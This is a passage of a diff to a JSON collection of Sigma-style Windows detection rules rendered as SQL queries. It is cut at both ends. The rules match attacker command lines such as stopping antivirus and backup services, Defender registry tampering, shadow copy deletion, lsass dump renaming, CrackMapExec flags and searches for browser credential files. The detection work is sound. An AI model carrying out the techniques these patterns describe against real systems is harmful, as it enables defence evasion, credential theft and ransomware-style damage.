OR CommandLine LIKE '%system.io.streamreader%' ESCAPE '\\' OR CommandLine LIKE '%readtoend(%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rdrleakdiag_process_dumping.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_compress.yml" }, { - "title": "Change Default File Association To Executable Via Assoc", - "id": "ae6f14e6-14de-45b0-9f44-c0986f50dc89", + "title": "Suspicious Windows Service Tampering", + "id": "ce72ef99-22f1-43d4-8695-419dcb5d9330", "status": "experimental", - "description": "Detects when a program changes the default file association of any extension to an executable.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ - "attack.persistence", - "attack.t1546.001" + "attack.defense_evasion", + "attack.t1489" ], "falsepositives": [ - "Unknown" + "Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%assoc %' ESCAPE '\\' AND CommandLine LIKE '%exefile%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.exe=exefile%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%143Svc%' ESCAPE '\\' OR CommandLine LIKE '%Acronis VSS Provider%' ESCAPE '\\' OR CommandLine LIKE '%AcronisAgent%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%ARSM%' ESCAPE '\\' OR CommandLine LIKE '%aswBcc%' ESCAPE '\\' OR CommandLine LIKE '%Avast Business Console Client Antivirus Service%' ESCAPE '\\' OR CommandLine LIKE '%avast! Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%avgAdminClient%' ESCAPE '\\' OR CommandLine LIKE '%AvgAdminServer%' ESCAPE '\\' OR CommandLine LIKE '%AVP1%' ESCAPE '\\' OR CommandLine LIKE '%BackupExec%' ESCAPE '\\' OR CommandLine LIKE '%bedbg%' ESCAPE '\\' OR CommandLine LIKE '%BITS%' ESCAPE '\\' OR CommandLine LIKE '%BrokerInfrastructure%' ESCAPE '\\' OR CommandLine LIKE '%Client Agent 7.60%' ESCAPE '\\' OR CommandLine LIKE '%Core Browsing Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Mail Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Scanning Server%' ESCAPE '\\' OR CommandLine LIKE '%DCAgent%' ESCAPE '\\' OR CommandLine LIKE '%EhttpSr%' ESCAPE '\\' OR CommandLine LIKE '%ekrn%' ESCAPE '\\' OR CommandLine LIKE '%Enterprise Client Service%' ESCAPE '\\' OR CommandLine LIKE '%epag%' ESCAPE '\\' OR CommandLine LIKE '%EPIntegrationService%' ESCAPE '\\' OR CommandLine LIKE '%EPProtectedService%' ESCAPE '\\' OR CommandLine LIKE '%EPRedline%' ESCAPE '\\' OR CommandLine LIKE '%EPSecurityService%' ESCAPE '\\' OR CommandLine LIKE '%EPUpdateService%' ESCAPE '\\' OR CommandLine LIKE '%EraserSvc11710%' ESCAPE '\\' OR CommandLine LIKE '%EsgShKernel%' ESCAPE '\\' OR CommandLine LIKE '%ESHASRV%' ESCAPE '\\' OR CommandLine LIKE '%FA\\_Scheduler%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdGuardianDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdServerDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%HealthTLService%' ESCAPE '\\' OR CommandLine LIKE '%HISSQLFDLauncherSSHAREPOINIT%' ESCAPE '\\' OR CommandLine LIKE '%hmpalertsvc%' ESCAPE '\\' OR CommandLine LIKE '%HMS%' ESCAPE '\\' OR CommandLine LIKE '%IISAdmin%' ESCAPE '\\' OR CommandLine LIKE '%IMANSVC%' ESCAPE '\\' OR CommandLine LIKE '%IMAP4Svc%' ESCAPE '\\' OR CommandLine LIKE '%KAVFS%' ESCAPE '\\' OR CommandLine LIKE '%KAVFSGT%' ESCAPE '\\' OR CommandLine LIKE '%kavfsslp%' ESCAPE '\\' OR CommandLine LIKE '%klbackupdisk%' ESCAPE '\\' OR CommandLine LIKE '%klbackupflt%' ESCAPE '\\' OR CommandLine LIKE '%klflt%' ESCAPE '\\' OR CommandLine LIKE '%klhk%' ESCAPE '\\' OR CommandLine LIKE '%KLIF%' ESCAPE '\\' OR CommandLine LIKE '%klim6%' ESCAPE '\\' OR CommandLine LIKE '%klkbdflt%' ESCAPE '\\' OR CommandLine LIKE '%klmouflt%' ESCAPE '\\' OR CommandLine LIKE '%klnagent%' ESCAPE '\\' OR CommandLine LIKE '%klpd%' ESCAPE '\\' OR CommandLine LIKE '%kltap%' ESCAPE '\\' OR CommandLine LIKE '%KSDE1.0.0%' ESCAPE '\\' OR CommandLine LIKE '%LogProcessorService%' ESCAPE '\\' OR CommandLine LIKE '%M8EndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%macmnsvc%' ESCAPE '\\' OR CommandLine LIKE '%masvc%' ESCAPE '\\' OR CommandLine LIKE '%MBAMService%' ESCAPE '\\' OR CommandLine LIKE '%MBCloudEA%' ESCAPE '\\' OR CommandLine LIKE '%MBEndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeDLPAgentService%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeEngineService%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEEEVENTPARSERSRV%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeFramework%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEETOMCATSRV530%' ESCAPE '\\' OR CommandLine LIKE '%McShield%' ESCAPE '\\' OR CommandLine LIKE '%McTaskManager%' ESCAPE '\\' OR CommandLine LIKE '%mfefire%' ESCAPE '\\' OR CommandLine LIKE '%mfemms%' ESCAPE '\\' OR CommandLine LIKE '%mfevto%' ESCAPE '\\' OR CommandLine LIKE '%mfevtp%' ESCAPE '\\' OR CommandLine LIKE '%mfewc%' ESCAPE '\\' OR CommandLine LIKE '%MMS%' ESCAPE '\\' OR CommandLine LIKE '%mozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%MsDtsServer%' ESCAPE '\\' OR CommandLine LIKE '%MSExchange%' ESCAPE '\\' OR CommandLine LIKE '%msftesq1SPROO%' ESCAPE '\\' OR CommandLine LIKE '%msftesql$PROD%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SQL\\_2008%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SYSTEM\\_BGC%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ!I.SPROFXENGAGEMEHT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SHAREPOINT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SOPHOS%' ESCAPE '\\' OR CommandLine LIKE '%MSSQL%' ESCAPE '\\' OR CommandLine LIKE '%MySQL%' ESCAPE '\\' OR CommandLine LIKE '%NanoServiceMain%' ESCAPE '\\' OR CommandLine LIKE '%NetMsmqActivator%' ESCAPE '\\' OR CommandLine LIKE '%ntrtscan%' ESCAPE '\\' OR CommandLine LIKE '%ofcservice%' ESCAPE '\\' OR CommandLine LIKE '%Online Protection System%' ESCAPE '\\' OR CommandLine LIKE '%OracleClientCache80%' ESCAPE '\\' OR CommandLine LIKE '%PandaAetherAgent%' ESCAPE '\\' OR CommandLine LIKE '%PccNTUpd%' ESCAPE '\\' OR CommandLine LIKE '%PDVFSService%' ESCAPE '\\' OR CommandLine LIKE '%POP3Svc%' ESCAPE '\\' OR CommandLine LIKE '%POVFSService%' ESCAPE '\\' OR CommandLine LIKE '%PSUAService%' ESCAPE '\\' OR CommandLine LIKE '%Quick Update Service%' ESCAPE '\\' OR CommandLine LIKE '%RepairService%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer$%' ESCAPE '\\' OR CommandLine LIKE '%RESvc%' ESCAPE '\\' OR CommandLine LIKE '%RpcEptMapper%' ESCAPE '\\' OR CommandLine LIKE '%sacsvr%' ESCAPE '\\' OR CommandLine LIKE '%SamSs%' ESCAPE '\\' OR CommandLine LIKE '%SAVAdminService%' ESCAPE '\\' OR CommandLine LIKE '%SAVService%' ESCAPE '\\' OR CommandLine LIKE '%ScSecSvc%' ESCAPE '\\' OR CommandLine LIKE '%SDRSVC%' ESCAPE '\\' OR CommandLine LIKE '%SentinelAgent%' ESCAPE '\\' OR CommandLine LIKE '%SentinelHelperService%' ESCAPE '\\' OR CommandLine LIKE '%SepMasterService%' ESCAPE '\\' OR CommandLine LIKE '%ShMonitor%' ESCAPE '\\' OR CommandLine LIKE '%Smcinst%' ESCAPE '\\' OR CommandLine LIKE '%SmcService%' ESCAPE '\\' OR CommandLine LIKE '%SMTPSvc%' ESCAPE '\\' OR CommandLine LIKE '%SNAC%' ESCAPE '\\' OR CommandLine LIKE '%SntpService%' ESCAPE '\\' OR CommandLine LIKE '%Sophos%' ESCAPE '\\' OR CommandLine LIKE '%SQ1SafeOLRService%' ESCAPE '\\' OR CommandLine LIKE '%SQL Backups%' ESCAPE '\\' OR CommandLine LIKE '%SQL Server%' ESCAPE '\\' OR CommandLine LIKE '%SQLAgent%' ESCAPE '\\' OR CommandLine LIKE '%SQLBrowser%' ESCAPE '\\' OR CommandLine LIKE '%SQLsafe%' ESCAPE '\\' OR CommandLine LIKE '%SQLSERVERAGENT%' ESCAPE '\\' OR CommandLine LIKE '%SQLTELEMETRY%' ESCAPE '\\' OR CommandLine LIKE '%SQLWriter%' ESCAPE '\\' OR CommandLine LIKE '%SSISTELEMETRY130%' ESCAPE '\\' OR CommandLine LIKE '%SstpSvc%' ESCAPE '\\' OR CommandLine LIKE '%svcGenericHost%' ESCAPE '\\' OR CommandLine LIKE '%swc\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_filter%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_update%' ESCAPE '\\' OR CommandLine LIKE '%Symantec%' ESCAPE '\\' OR CommandLine LIKE '%Telemetryserver%' ESCAPE '\\' OR CommandLine LIKE '%ThreatLockerService%' ESCAPE '\\' OR CommandLine LIKE '%TMBMServer%' ESCAPE '\\' OR CommandLine LIKE '%TmCCSF%' ESCAPE '\\' OR CommandLine LIKE '%TmFilter%' ESCAPE '\\' OR CommandLine LIKE '%TMiCRCScanService%' ESCAPE '\\' OR CommandLine LIKE '%tmlisten%' ESCAPE '\\' OR CommandLine LIKE '%TMLWCSService%' ESCAPE '\\' OR CommandLine LIKE '%TmPfw%' ESCAPE '\\' OR CommandLine LIKE '%TmPreFilter%' ESCAPE '\\' OR CommandLine LIKE '%TmProxy%' ESCAPE '\\' OR CommandLine LIKE '%TMSmartRelayService%' ESCAPE '\\' OR CommandLine LIKE '%tmusa%' ESCAPE '\\' OR CommandLine LIKE '%Trend Micro Deep Security Manager%' ESCAPE '\\' OR CommandLine LIKE '%TrueKey%' ESCAPE '\\' OR CommandLine LIKE '%UI0Detect%' ESCAPE '\\' OR CommandLine LIKE '%UTODetect%' ESCAPE '\\' OR CommandLine LIKE '%Veeam%' ESCAPE '\\' OR CommandLine LIKE '%VeemaDep/oySvc%' ESCAPE '\\' OR CommandLine LIKE '%Veritas System Recovery%' ESCAPE '\\' OR CommandLine LIKE '%VSApiNt%' ESCAPE '\\' OR CommandLine LIKE '%VSS%' ESCAPE '\\' OR CommandLine LIKE '%W3Svc%' ESCAPE '\\' OR CommandLine LIKE '%wbengine%' ESCAPE '\\' OR CommandLine LIKE '%WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%WeanClOudSve%' ESCAPE '\\' OR CommandLine LIKE '%Weems JY%' ESCAPE '\\' OR CommandLine LIKE '%WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%wozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%WRSVC%' ESCAPE '\\' OR CommandLine LIKE '%Zoolz 2 Service%' ESCAPE '\\') AND ((((OriginalFileName IN ('net.exe', 'net1.exe') OR (NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\')) AND CommandLine LIKE '% stop %' ESCAPE '\\') OR ((OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '%Stop-Service %' ESCAPE '\\' OR CommandLine LIKE '%Remove-Service %' ESCAPE '\\'))) OR ((OriginalFileName = 'sc.exe' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\') AND (CommandLine LIKE '% stop %' ESCAPE '\\' OR CommandLine LIKE '% delete %' ESCAPE '\\' OR CommandLine LIKE '% pause %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_cmd_assoc_tamper_exe_file_association.yml" + "filename": "proc_creation_win_susp_service_tamper.yml" }, { - "title": "Suspicious Windows Defender Registry Key Tampering Via Reg.EXE", - "id": "452bce90-6fb0-43cc-97a5-affc283139b3", + "title": "Potential Execution of Sysinternals Tools", + "id": "7cccd811-7ae9-4ebe-9afd-cb5c406b824b", "status": "experimental", - "description": "Detects the usage of \"reg.exe\" to tamper with different Windows defender registry keys in order to disable some important features related to protection and detection", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects command lines that contain the 'accepteula' flag which could be a sign of execution of one of the Sysinternals tools", + "author": "Markus Neis", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Rare legitimate use by administrators to test software (should always be investigated)" + "Legitimate use of SysInternals tools", + "Programs that use the same command line flag" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\')) AND ((CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND (CommandLine LIKE '%Real-Time Protection%' ESCAPE '\\' OR CommandLine LIKE '%TamperProtection%' ESCAPE '\\')) OR (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Notification\\_Suppress%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -accepteula%' ESCAPE '\\' OR CommandLine LIKE '% /accepteula%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_defender_tampering.yml" + "filename": "proc_creation_win_sysinternals_eula_accepted.yml" }, { - "title": "Suspicious XOR Encoded PowerShell Command", - "id": "bb780e0c-16cf-4383-8383-1e5471db6cf9", + "title": "Disabled IE Security Features", + "id": "fb50eb7a-5ab1-43ae-bcc9-091818cb8424", "status": "test", - "description": "Detects presence of a potentially xor encoded powershell command", - "author": "Sami Ruohonen, Harish Segar, Tim Shelton, Teymur Kheirkhabarov, Vasiliy Burov, oscd.community, Nasreddine Bencherchali", + "description": "Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1059.001", - "attack.t1140", - "attack.t1027" + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6') AND CommandLine LIKE '%bxor%' ESCAPE '\\' AND (CommandLine LIKE '%ForEach%' ESCAPE '\\' OR CommandLine LIKE '%for(%' ESCAPE '\\' OR CommandLine LIKE '%for %' ESCAPE '\\' OR CommandLine LIKE '%-join %' ESCAPE '\\' OR CommandLine LIKE '%-join''%' ESCAPE '\\' OR CommandLine LIKE '%-join\"%' ESCAPE '\\' OR CommandLine LIKE '%-join`%' ESCAPE '\\' OR CommandLine LIKE '%::Join%' ESCAPE '\\' OR CommandLine LIKE '%[char]%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% -name IEHarden %' ESCAPE '\\' AND CommandLine LIKE '% -value 0 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DEPOff %' ESCAPE '\\' AND CommandLine LIKE '% -value 1 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DisableFirstRunCustomize %' ESCAPE '\\' AND CommandLine LIKE '% -value 2 %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_xor_commandline.yml" + "filename": "proc_creation_win_powershell_disable_ie_features.yml" }, { - "title": "Suspicious Where Execution", - "id": "725a9768-0f5e-4cb3-aec2-bc5719c6831a", - "status": "experimental", - "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\nBrowser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about\ninternal network resources such as servers, tools/dashboards, or other related infrastructure.\n", - "author": "frack113, Nasreddine Bencherchali", - "tags": [ - "attack.discovery", - "attack.t1217" - ], + "title": "HackTool - CrackMapExec Execution", + "id": "42a993dd-bb3e-48c8-b372-4d6684c4106c", + "status": "test", + "description": "This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\where.exe' ESCAPE '\\' OR OriginalFileName = 'where.exe') AND (CommandLine LIKE '%places.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%cookies.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%formhistory.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%logins.json%' ESCAPE '\\' OR CommandLine LIKE '%key4.db%' ESCAPE '\\' OR CommandLine LIKE '%key3.db%' ESCAPE '\\' OR CommandLine LIKE '%sessionstore.jsonlz4%' ESCAPE '\\' OR CommandLine LIKE '%History%' ESCAPE '\\' OR CommandLine LIKE '%Bookmarks%' ESCAPE '\\' OR CommandLine LIKE '%Cookies%' ESCAPE '\\' OR CommandLine LIKE '%Login Data%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\crackmapexec.exe' ESCAPE '\\' OR CommandLine LIKE '% -M pe\\_inject %' ESCAPE '\\' OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -x %' ESCAPE '\\') OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -H ''NTHASH''%' ESCAPE '\\') OR (CommandLine LIKE '% mssql %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -H %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -o %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% --local-auth%' ESCAPE '\\')) OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% 10.%' ESCAPE '\\' AND CommandLine LIKE '% 192.168.%' ESCAPE '\\' AND CommandLine LIKE '%/24 %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_where_browser_data_recon.yml" + "filename": "proc_creation_win_hktl_crackmapexec_execution.yml" }, { - "title": "Execute MSDT Via Answer File", - "id": "9c8c7000-3065-44a8-a555-79bcba5d9955", + "title": "Suspicious Regsvr32 Execution With Image Extension", + "id": "089fc3d2-71e8-4763-a8a5-c97fbb0a403e", "status": "experimental", - "description": "Detects execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the compatibility tab)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of REGSVR32.exe with DLL files masquerading as image files", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.t1218.010" ], "falsepositives": [ - "Possible undocumented parents of \"msdt\" other than \"pcwrun\"" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\WINDOWS\\\\diagnostics\\\\index\\\\PCWDiagnostic.xml%' ESCAPE '\\' AND (CommandLine LIKE '% -af %' ESCAPE '\\' OR CommandLine LIKE '% /af %' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\pcwrun.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND (CommandLine LIKE '%.bmp' ESCAPE '\\' OR CommandLine LIKE '%.cr2' ESCAPE '\\' OR CommandLine LIKE '%.eps' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.ico' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.nef' ESCAPE '\\' OR CommandLine LIKE '%.orf' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.raw' ESCAPE '\\' OR CommandLine LIKE '%.sr2' ESCAPE '\\' OR CommandLine LIKE '%.tif' ESCAPE '\\' OR CommandLine LIKE '%.tiff' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_msdt_answer_file.yml" + "filename": "proc_creation_win_regsvr32_image.yml" }, { - "title": "New Kernel Driver Via SC.EXE", - "id": "431a1fdb-4799-4f3b-91c3-a683b003fc49", + "title": "Deletion of Volume Shadow Copies via WMI with PowerShell", + "id": "21ff4ca9-f13a-41ad-b828-0077b2af2e40", "status": "experimental", - "description": "Detects creation of a new service (kernel driver) with the type \"kernel\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "author": "Tim Rauch", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Rare legitimate installation of kernel drivers via sc.exe" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND (CommandLine LIKE '%create%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\') AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND CommandLine LIKE '%type%' ESCAPE '\\' AND CommandLine LIKE '%kernel%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Get-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%gwmi%' ESCAPE '\\' OR CommandLine LIKE '%Get-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%gcim%' ESCAPE '\\') AND CommandLine LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (CommandLine LIKE '%.Delete()%' ESCAPE '\\' OR CommandLine LIKE '%Remove-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%rwmi%' ESCAPE '\\' OR CommandLine LIKE '%Remove-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%rcim%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sc_new_kernel_driver.yml" + "filename": "proc_creation_win_powershell_shadowcopy_deletion.yml" }, { - "title": "Suspicious Hacktool Execution - PE Metadata", - "id": "37c1333a-a0db-48be-b64b-7393b2386e3b", - "status": "experimental", - "description": "Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed", + "title": "Potential Procdump Evasion", + "id": "79b06761-465f-4f88-9ef2-150e24d3d737", + "status": "test", + "description": "Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" + ], "falsepositives": [ - "Unlikely" + "Cases in which procdump just gets copied to a different directory without any renaming" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Company = 'Cube0x0')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%copy procdump%' ESCAPE '\\' OR CommandLine LIKE '%move procdump%' ESCAPE '\\') OR (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%.dmp %' ESCAPE '\\' AND (CommandLine LIKE '%2.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%out.dmp%' ESCAPE '\\')) OR (CommandLine LIKE '%copy lsass.exe\\_%' ESCAPE '\\' OR CommandLine LIKE '%move lsass.exe\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_execution_via_pe_metadata.yml" + "filename": "proc_creation_win_sysinternals_procdump_evasion.yml" }, { - "title": "Process Reconnaissance Via Wmic.EXE", - "id": "221b251a-357a-49a9-920a-271802777cc0", + "title": "AADInternals PowerShell Cmdlets Execution - ProccessCreation", + "id": "c86500e9-a645-4680-98d7-f882c70c1ea3", "status": "experimental", - "description": "Detects the execution of \"wmic\" with the \"process\" flag, which adversary might use to list processes running on the compromised host or list installed software hotfixes and patches.", - "author": "frack113", + "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", + "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1047" + "attack.reconnaissance", + "attack.discovery", + "attack.credential_access", + "attack.impact" ], "falsepositives": [ - "Unknown" + "Legitimate use of the library for administrative activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%process%' ESCAPE '\\') AND NOT (CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Disable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Enable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Export-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Get-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Grant-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Install-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Join-AADInt%' ESCAPE '\\' OR CommandLine LIKE 